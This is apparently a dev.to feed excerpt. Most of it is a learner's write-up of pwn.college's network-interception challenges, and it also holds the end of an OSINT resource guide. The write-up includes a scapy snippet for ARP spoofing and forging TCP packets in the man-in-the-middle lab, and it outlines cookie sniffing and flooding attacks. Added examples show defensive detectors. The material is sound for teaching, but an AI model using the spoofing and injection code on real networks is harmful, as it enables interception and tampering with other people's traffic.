&lt;a href="https://bellingcat.gitbook.io/" rel="noopener noreferrer"&gt;&lt;strong&gt;Bellingcat's Guide to Geolocation&lt;/strong&gt;&lt;/a&gt; - Detailed guide on using shadows for geolocation&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  GIS Resources
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.qgistutorials.com/" rel="noopener noreferrer"&gt;&lt;strong&gt;QGIS Tutorials and Tips&lt;/strong&gt;&lt;/a&gt; - Free, comprehensive tutorials for QGIS&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.esri.com/training/" rel="noopener noreferrer"&gt;&lt;strong&gt;Esri Training&lt;/strong&gt;&lt;/a&gt; - Some free courses on GIS fundamentals&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://earthexplorer.usgs.gov/" rel="noopener noreferrer"&gt;&lt;strong&gt;USGS Earth Explorer&lt;/strong&gt;&lt;/a&gt; - Free satellite imagery and aerial photos&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.naturalearthdata.com/" rel="noopener noreferrer"&gt;&lt;strong&gt;Natural Earth&lt;/strong&gt;&lt;/a&gt; - Free vector and raster map data&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.openstreetmap.org/" rel="noopener noreferrer"&gt;&lt;strong&gt;OpenStreetMap&lt;/strong&gt;&lt;/a&gt; - Free, editable map of the world&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  OSINT Communities
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;r/OSINT&lt;/strong&gt; - Reddit community with frequent GIS-related discussions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Geographic Information Systems Stack Exchange&lt;/strong&gt; - Q&amp;amp;A for GIS professionals&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;OSINT is a powerful discipline that combines technical skills with creative problem-solving and attention to detail. The most effective OSINT practitioners develop proficiency with a range of tools while understanding that tools alone are not sufficient—critical thinking and analytical skills remain essential.&lt;/p&gt;

&lt;p&gt;The OSINT process is iterative and requires patience, persistence, and a commitment to ethical practice. As you continue your OSINT journey, remember that the field is constantly evolving. Staying current with new resources and techniques is an important part of OSINT practice.&lt;/p&gt;

&lt;p&gt;Whether you're conducting social media research, geolocation work, or corporate investigations, the skills you've learned in this guide will serve as a solid foundation for effective OSINT work. With the right tools, techniques, and ethical framework, you can turn scattered public data into actionable intelligence.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Disclaimer: The tools and techniques described in this guide are intended for ethical and legal use only. Always respect privacy, platform terms of service, and applicable laws when conducting OSINT investigations.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Reference: &lt;a href="https://freeosint.github.io/pages/training.html" rel="noopener noreferrer"&gt;FreeOSINT&lt;/a&gt;&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>What happened to zeroday.forem.com domain?? I had my posts there and now I cannot find anything. Who should I contact? Any help please</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Tue, 09 Jun 2026 15:58:06 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/what-happened-to-zerodayforemcom-domain-i-had-my-posts-there-an-no-i-cannot-find-anything-who-1c1n</link>
      <guid>https://dev.to/hitanshugedam/what-happened-to-zerodayforemcom-domain-i-had-my-posts-there-an-no-i-cannot-find-anything-who-1c1n</guid>
      <description></description>
      <category>community</category>
      <category>discuss</category>
      <category>web</category>
    </item>
    <item>
      <title>Intercepting Communication on pwn.college's Intro to Cybersecurity Dojo</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Sun, 07 Jun 2026 08:43:47 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/intercepting-communication-on-pwncolleges-intro-to-cybersecurity-dojo-n3</link>
      <guid>https://dev.to/hitanshugedam/intercepting-communication-on-pwncolleges-intro-to-cybersecurity-dojo-n3</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;I recently completed pwn.college's "Intercepting Communication" track inside the Intro to Cybersecurity dojo, a series of challenges that took me from the basics of socket programming to executing a full man-in-the-middle (MITM) attack. This post documents what I learned and how each challenge built upon the last.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phase 1: The Basics of Network Communication
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Connect, Send, Shutdown, Listen
&lt;/h3&gt;

&lt;p&gt;These initial challenges taught me the fundamentals of socket programming:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Connect&lt;/strong&gt;: Establishing TCP connections to remote hosts&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Send&lt;/strong&gt;: Transmitting data over established connections&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Shutdown&lt;/strong&gt;: Properly closing connections (half-closed vs. fully closed)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Listen&lt;/strong&gt;: Creating a server that accepts incoming connections&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The key insight was understanding the TCP state machine and how &lt;code&gt;shutdown()&lt;/code&gt; differs from &lt;code&gt;close()&lt;/code&gt; - &lt;code&gt;shutdown()&lt;/code&gt; allows graceful half-closed connections while &lt;code&gt;close()&lt;/code&gt; tears down the entire socket.&lt;/p&gt;
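<![CDATA[<p>Added example, not code from the original post: a loopback echo server and client in Python showing the half-close. The client calls shutdown(SHUT_WR) so the server sees EOF yet can still reply, while the close() variant loses the socket before the reply can be read.</p>

```python
import socket
import threading

# Added example (not from the original post). A tiny TCP echo server and a
# client that half-closes with shutdown(SHUT_WR): the client signals "no more
# data" but keeps its receive side open for the reply. close() releases the
# whole socket, so nothing can be received afterwards.


def run_echo_server(listener):
    """Accept one connection, echo (upper-cased) until the peer half-closes, then close."""
    conn, _ = listener.accept()
    with conn:
        while True:
            chunk = conn.recv(4096)
            if not chunk:              # b"" means the client sent FIN (half-close)
                break
            conn.sendall(chunk.upper())
    listener.close()


def start_server():
    """Bind an ephemeral loopback port, serve one client in a thread, return the port."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    threading.Thread(target=run_echo_server, args=(listener,), daemon=True).start()
    return listener.getsockname()[1]


def half_close_exchange(port, payload):
    """Send payload, half-close the write side, and collect everything echoed back."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)     # our FIN goes out; recv() still works
        received = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:              # server closed too: EOF on our side
                break
            received += chunk
        return received


def full_close_exchange(port, payload):
    """Same exchange but with close() instead of shutdown(): the descriptor is
    gone, so recv() raises. Returns the exception class name instead of data."""
    s = socket.create_connection(("127.0.0.1", port), timeout=5)
    s.sendall(payload)
    s.close()                          # tears down the whole socket
    try:
        s.recv(4096)
    except OSError as exc:
        return type(exc).__name__
    return "no error"


if __name__ == "__main__":
    print(half_close_exchange(start_server(), b"hello, half-close"))
    print(full_close_exchange(start_server(), b"hello, full close"))
```
]]>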

&lt;h3&gt;
  
  
  Scan 1 &amp;amp; 2: Port Scanning
&lt;/h3&gt;

&lt;p&gt;These challenges introduced me to network reconnaissance:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;TCP Connect scanning vs. SYN scanning&lt;/li&gt;
&lt;li&gt;Understanding service identification through banner grabbing&lt;/li&gt;
&lt;li&gt;Handling timeouts and connection refusals&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I learned that a SYN scan (&lt;code&gt;nmap -sS&lt;/code&gt;) is faster and stealthier than a full TCP connect scan because it never completes the handshake.&lt;/p&gt;

&lt;h3&gt;
  
  
  Monitor 1 &amp;amp; 2: Traffic Analysis
&lt;/h3&gt;

&lt;p&gt;Using &lt;code&gt;tcpdump&lt;/code&gt; and Wireshark, I learned to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Capture packets with filters (&lt;code&gt;host&lt;/code&gt;, &lt;code&gt;port&lt;/code&gt;, &lt;code&gt;tcp&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Analyze TCP flags (SYN, ACK, RST, FIN)&lt;/li&gt;
&lt;li&gt;Identify suspicious patterns in network traffic&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The &lt;code&gt;tshark&lt;/code&gt; command became my best friend: &lt;code&gt;tshark -r capture.pcap -Y "tcp.flags.syn == 1"&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Sniffing Cookies
&lt;/h3&gt;

&lt;p&gt;This was my first taste of how dangerous unencrypted traffic can be. By sniffing HTTP traffic, I could extract session cookies and impersonate users. This drove home why HTTPS is essential for any authentication.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phase 2: Network Control
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Network Configuration
&lt;/h3&gt;

&lt;p&gt;Understanding IP addressing, subnet masks (&lt;code&gt;/24&lt;/code&gt;, &lt;code&gt;/16&lt;/code&gt;), routing tables, and default gateways. The &lt;code&gt;ip&lt;/code&gt; command replaced the deprecated &lt;code&gt;ifconfig&lt;/code&gt; in my toolkit.&lt;/p&gt;

&lt;h3&gt;
  
  
  Firewall 1, 2, 3
&lt;/h3&gt;

&lt;p&gt;These challenges taught &lt;code&gt;iptables&lt;/code&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Firewall 1&lt;/strong&gt;: Basic filtering (ACCEPT/DROP rules)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Firewall 2&lt;/strong&gt;: Stateful inspection (tracking established connections)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Firewall 3&lt;/strong&gt;: NAT and port redirection&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Key rules I learned:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;iptables &lt;span class="nt"&gt;-A&lt;/span&gt; INPUT &lt;span class="nt"&gt;-p&lt;/span&gt; tcp &lt;span class="nt"&gt;--dport&lt;/span&gt; 22 &lt;span class="nt"&gt;-j&lt;/span&gt; ACCEPT
iptables &lt;span class="nt"&gt;-A&lt;/span&gt; INPUT &lt;span class="nt"&gt;-m&lt;/span&gt; state &lt;span class="nt"&gt;--state&lt;/span&gt; ESTABLISHED,RELATED &lt;span class="nt"&gt;-j&lt;/span&gt; ACCEPT
iptables &lt;span class="nt"&gt;-t&lt;/span&gt; nat &lt;span class="nt"&gt;-A&lt;/span&gt; PREROUTING &lt;span class="nt"&gt;-p&lt;/span&gt; tcp &lt;span class="nt"&gt;--dport&lt;/span&gt; 80 &lt;span class="nt"&gt;-j&lt;/span&gt; REDIRECT &lt;span class="nt"&gt;--to-port&lt;/span&gt; 8080
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Denial of Service 1, 2, 3
&lt;/h3&gt;

&lt;p&gt;These challenges demonstrated various DoS attack vectors:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;SYN flood&lt;/strong&gt;: Exhausting connection queues with incomplete handshakes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;UDP flood&lt;/strong&gt;: Overwhelming bandwidth with stateless packets&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Application layer attacks&lt;/strong&gt;: Slowloris-style attacks keeping connections open&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Mitigation techniques included SYN cookies, rate limiting, and connection timeouts.&lt;/p&gt;
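<![CDATA[<p>Added example for the Monitor and Denial of Service challenges above, not from the original post: detection logic in Python over constructed tshark-style records (the assumed field order is frame.time_relative, ip.src, ip.dst, tcp.srcport, tcp.dstport, tcp.flags in hex). It tracks each handshake's state and reports sources that probe many ports without ever completing a connection (SYN scan) and server ports left with many half-open handshakes (SYN flood), which is the condition SYN cookies and rate limiting exist to absorb.</p>

```python
from collections import defaultdict

# Added example (not from the original post): handshake tracking over
# tshark-style records. Flag bits as tshark reports them in tcp.flags.
SYN, ACK, RST = 0x002, 0x010, 0x004

SCAN_MIN_PORTS = 10          # distinct destination ports one source probed without opening any
FLOOD_MIN_HALF_OPEN = 50     # half-open handshakes left dangling on one server port


def constructed_capture():
    """Constructed sample traffic (not a real capture): one legitimate handshake,
    a SYN scan of 15 ports from 10.0.0.9 (SYN, SYN-ACK, RST, never ACK) and a
    SYN flood of 60 spoofed sources against port 443 that is never completed."""
    lines = [
        "0.000 10.0.0.7 10.0.0.1 40001 80 0x002",
        "0.001 10.0.0.1 10.0.0.7 80 40001 0x012",
        "0.002 10.0.0.7 10.0.0.1 40001 80 0x010",
    ]
    t = 1.0
    for port in range(1, 16):
        lines.append(f"{t:.3f} 10.0.0.9 10.0.0.1 55000 {port} 0x002")
        lines.append(f"{t + 0.001:.3f} 10.0.0.1 10.0.0.9 {port} 55000 0x012")
        lines.append(f"{t + 0.002:.3f} 10.0.0.9 10.0.0.1 55000 {port} 0x004")
        t += 0.01
    for i in range(60):
        lines.append(f"{t:.3f} 192.0.2.{i + 1} 10.0.0.1 {30000 + i} 443 0x002")
        lines.append(f"{t + 0.001:.3f} 10.0.0.1 192.0.2.{i + 1} 443 {30000 + i} 0x012")
        t += 0.01
    return lines


def parse_records(lines):
    """Yield (time, src, dst, sport, dport, flags) from whitespace-separated fields."""
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, sport, dport, flags = line.split()
        yield float(ts), src, dst, int(sport), int(dport), int(flags, 16)


def analyse(lines):
    """Track every handshake keyed by (client, server, client port, server port)
    through syn -> synack -> open, with reset for an aborted attempt."""
    state = {}
    for _, src, dst, sport, dport, flags in parse_records(lines):
        fwd, rev = (src, dst, sport, dport), (dst, src, dport, sport)
        if flags & SYN and not flags & ACK:          # client SYN: new half-open handshake
            state[fwd] = "syn"
        elif flags & SYN and flags & ACK:            # server SYN-ACK: still half-open
            if state.get(rev) == "syn":
                state[rev] = "synack"
        elif flags & RST:                            # either side aborts
            for key in (fwd, rev):
                if state.get(key) in ("syn", "synack"):
                    state[key] = "reset"
        elif flags & ACK:                            # client's final ACK completes it
            if state.get(fwd) == "synack":
                state[fwd] = "open"

    probes = defaultdict(set)        # source -> server ports it touched without opening
    half_open = defaultdict(set)     # (server, port) -> sources left in a half-open state
    completed = 0
    for (client, server, _, sport), st in state.items():
        if st == "open":
            completed += 1
            continue
        probes[client].add(sport)
        if st in ("syn", "synack"):
            half_open[(server, sport)].add(client)
    return {
        "completed": completed,
        "syn_scan": {src: len(p) for src, p in probes.items() if len(p) >= SCAN_MIN_PORTS},
        "syn_flood": {tgt: len(s) for tgt, s in half_open.items() if len(s) >= FLOOD_MIN_HALF_OPEN},
    }


if __name__ == "__main__":
    print(analyse(constructed_capture()))
```
]]>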

&lt;h2&gt;
  
  
  Phase 3: Protocol Deep Dive
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Ethernet
&lt;/h3&gt;

&lt;p&gt;Understanding MAC addresses, ARP, and the data link layer. The Ethernet frame structure (destination MAC, source MAC, EtherType, payload, FCS) became second nature.&lt;/p&gt;

&lt;h3&gt;
  
  
  IP
&lt;/h3&gt;

&lt;p&gt;IPv4 header dissection: version, IHL, TOS, total length, identification, flags, fragment offset, TTL, protocol, checksum, source/destination addresses. The TTL field's role in preventing routing loops was particularly interesting.&lt;/p&gt;

&lt;h3&gt;
  
  
  TCP
&lt;/h3&gt;

&lt;p&gt;The Transmission Control Protocol's reliability mechanisms:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Sequence and acknowledgment numbers&lt;/li&gt;
&lt;li&gt;Windowing and flow control&lt;/li&gt;
&lt;li&gt;Retransmission and timeout handling&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  TCP Handshake
&lt;/h3&gt;

&lt;p&gt;The three-way handshake (SYN, SYN-ACK, ACK) and four-way teardown (FIN, ACK, FIN, ACK). I learned to craft handshake packets using &lt;code&gt;scapy&lt;/code&gt; and observe state transitions.&lt;/p&gt;

&lt;h3&gt;
  
  
  UDP
&lt;/h3&gt;

&lt;p&gt;Connectionless, unreliable, but fast. UDP's simplicity makes it ideal for DNS, DHCP, and streaming. No handshake means lower latency but no delivery guarantees.&lt;/p&gt;

&lt;h3&gt;
  
  
  UDP Spoofing 1-4
&lt;/h3&gt;

&lt;p&gt;These challenges escalated in complexity:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Basic spoofing&lt;/strong&gt;: Forging source IP addresses&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Response spoofing&lt;/strong&gt;: Injecting fake replies&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Amplification attacks&lt;/strong&gt;: Using UDP's stateless nature for reflection attacks (e.g., DNS amplification)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sequence prediction&lt;/strong&gt;: While harder with UDP, understanding how to craft valid responses&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Phase 4: The Big Leagues
&lt;/h2&gt;

&lt;h3&gt;
  
  
  ARP
&lt;/h3&gt;

&lt;p&gt;The Address Resolution Protocol maps IP addresses to MAC addresses. Its stateless, trust-based nature makes it vulnerable to spoofing. I learned to send gratuitous ARP replies and how &lt;code&gt;arp -a&lt;/code&gt; can reveal the ARP cache.&lt;/p&gt;

&lt;h3&gt;
  
  
  Intercept
&lt;/h3&gt;

&lt;p&gt;This challenge required passive interception - capturing traffic between two hosts without modifying it. Using &lt;code&gt;tcpdump&lt;/code&gt; or &lt;code&gt;scapy&lt;/code&gt; in promiscuous mode, I learned to sniff packets not destined for my MAC address.&lt;/p&gt;

&lt;h3&gt;
  
  
  Man-in-the-Middle
&lt;/h3&gt;

&lt;p&gt;The final boss. Here's what I executed:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# ARP spoofing to redirect traffic
&lt;/span&gt;&lt;span class="n"&gt;arp_spoof&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;ARP&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;op&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pdst&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;target_ip&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;hwdst&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;target_mac&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;psrc&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;spoof_ip&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nf"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;arp_spoof&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;loop&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;inter&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Packet interception and modification
&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;process&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pkt&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;pkt&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;Raw&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;load&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sa"&gt;b&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;command: &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# Forge a response with "flag" instead of "echo"
&lt;/span&gt;        &lt;span class="n"&gt;forged&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;IP&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;pkt&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;IP&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;dst&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dst&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;pkt&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;IP&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="nc"&gt;TCP&lt;/span&gt;&lt;span class="p"&gt;(...)&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="nc"&gt;Raw&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;b&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;flag&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;forged&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The breakthrough came when I realized I didn't need IP forwarding - with ARP spoofing and active packet injection, I could intercept and modify traffic directly.&lt;/p&gt;
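<![CDATA[<p>Added example, not from the original post: the host-side check that catches the ARP spoofing described above, in Python. It parses raw Ethernet/ARP frames, learns IP-to-MAC bindings from replies, and alerts on a reply that conflicts with a known binding or that nobody asked for; the sample frames are constructed inline with placeholder addresses.</p>

```python
import ipaddress
import struct

# Added example (not from the original post). Minimal Ethernet/ARP parsing plus
# an inspector that keeps an IP -> MAC table learned from replies and alerts when
# a reply rebinds a known IP to a different MAC or arrives without a matching
# request. Switch-side Dynamic ARP Inspection applies the same idea using DHCP
# snooping data as the trusted table.

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def _mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def _mac_bytes(text):
    return bytes.fromhex(text.replace(":", ""))


def parse_arp_frame(frame):
    """Return (op, sender_mac, sender_ip, target_mac, target_ip), or None if the
    frame is not an Ethernet/IPv4 ARP frame."""
    if len(frame) < 42:
        return None
    _, _, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return (op, _mac_str(sha), str(ipaddress.IPv4Address(spa)),
            _mac_str(tha), str(ipaddress.IPv4Address(tpa)))


def build_arp_frame(op, sender_mac, sender_ip, target_mac, target_ip):
    """Build a raw ARP frame; used here only to construct sample traffic."""
    dst = _mac_bytes(target_mac) if op == ARP_REPLY else b"\xff" * 6
    eth = struct.pack("!6s6sH", dst, _mac_bytes(sender_mac), ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                      _mac_bytes(sender_mac), ipaddress.IPv4Address(sender_ip).packed,
                      _mac_bytes(target_mac), ipaddress.IPv4Address(target_ip).packed)
    return eth + arp


class ArpInspector:
    def __init__(self):
        self.table = {}          # ip -> mac, learned from the first reply seen
        self.pending = set()     # (asker_ip, wanted_ip) for requests seen on the wire
        self.alerts = []

    def observe(self, frame):
        """Feed one frame; return an alert string or None."""
        parsed = parse_arp_frame(frame)
        if parsed is None:
            return None
        op, sha, spa, _, tpa = parsed
        if op == ARP_REQUEST:
            self.pending.add((spa, tpa))
            return None
        if op != ARP_REPLY:
            return None
        verdict = None
        if (tpa, spa) not in self.pending:      # gratuitous or otherwise unrequested reply
            verdict = f"unsolicited reply: {spa} is-at {sha}"
        self.pending.discard((tpa, spa))
        known = self.table.get(spa)
        if known is not None and known != sha:  # the pattern ARP spoofing produces
            verdict = f"conflict: {spa} moved from {known} to {sha}"
        else:
            self.table[spa] = sha               # keep the first binding, never the conflicting one
        if verdict:
            self.alerts.append(verdict)
        return verdict


if __name__ == "__main__":
    insp = ArpInspector()
    insp.observe(build_arp_frame(ARP_REQUEST, "aa:aa:aa:aa:aa:05", "10.0.0.5", "00:00:00:00:00:00", "10.0.0.1"))
    insp.observe(build_arp_frame(ARP_REPLY, "11:11:11:11:11:01", "10.0.0.1", "aa:aa:aa:aa:aa:05", "10.0.0.5"))
    print(insp.observe(build_arp_frame(ARP_REPLY, "cc:cc:cc:cc:cc:cc", "10.0.0.1", "aa:aa:aa:aa:aa:05", "10.0.0.5")))
```
]]>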

&lt;h2&gt;
  
  
  Key Takeaways
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Network security is layered&lt;/strong&gt; - vulnerabilities at any layer (ARP at L2, IP at L3, TCP/UDP at L4) can compromise higher layers.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Trust is dangerous&lt;/strong&gt; - ARP, UDP, and even TCP sequence numbers (in older implementations) rely on trust that can be abused.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Encryption isn't optional&lt;/strong&gt; - Many challenges (especially Sniffing Cookies) showed why plaintext protocols are unacceptable.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Tools are powerful&lt;/strong&gt; - &lt;code&gt;scapy&lt;/code&gt; for packet crafting, &lt;code&gt;tcpdump&lt;/code&gt; for capture, &lt;code&gt;iptables&lt;/code&gt; for firewall rules, &lt;code&gt;nmap&lt;/code&gt; for scanning.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Defense requires depth&lt;/strong&gt; - A single countermeasure isn't enough. ARP spoofing is mitigated by static ARP entries, DAI (Dynamic ARP Inspection), and network segmentation.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;This track transformed how I see network traffic. Every packet tells a story - who's talking, what they're saying, and whether we can trust them. The MITM challenge pulled everything together: I had to understand ARP to redirect traffic, TCP to maintain sequence/ack numbers, packet crafting to forge responses, and protocol analysis to know when to inject.&lt;/p&gt;

&lt;p&gt;For anyone learning network security, I can't recommend pwn.college enough. These challenges are well-designed, progressive, and brutally educational.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;All challenges completed on pwn.college's platform. Thanks to the Arizona State University team for creating such an excellent learning resource.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>cybersecurity</category>
      <category>networking</category>
      <category>programming</category>
    </item>
    <item>
      <title>How I Learned Syscalls by Building a Web Server on pwn.college</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Sat, 16 May 2026 14:43:55 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/how-i-learned-syscalls-by-building-a-web-server-on-pwncollege-2p8m</link>
      <guid>https://dev.to/hitanshugedam/how-i-learned-syscalls-by-building-a-web-server-on-pwncollege-2p8m</guid>
      <description>&lt;h3&gt;
  
  
  From Zero to Web Server
&lt;/h3&gt;

&lt;p&gt;No full solutions here. Just the journey, the lessons, and the honest truth.&lt;/p&gt;

&lt;h3&gt;
  
  
  A Note on Learning (and Honesty)
&lt;/h3&gt;

&lt;p&gt;Before I go any further: I'm not going to paste my solutions in this post.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://pwn.college" rel="noopener noreferrer"&gt;pwn.college&lt;/a&gt; is a learning platform. The challenges are meant to be solved, not copied. If I just dumped my assembly code here, I'd be robbing someone else of the chance to struggle, fail, debug, and eventually feel that incredible rush when the checker program finally says PASS.&lt;/p&gt;

&lt;p&gt;Also, I want to be completely transparent. Out of the 11 challenges in this module, there were &lt;strong&gt;fewer than 5&lt;/strong&gt; where I got so stuck that I reached for help from an AI. Not to generate full solutions, but to explain a syscall I didn't understand, or to help me reason through why something was failing. I still wrote every line of assembly myself. And every time I got help, I made sure I understood why the fix worked before moving on.&lt;/p&gt;

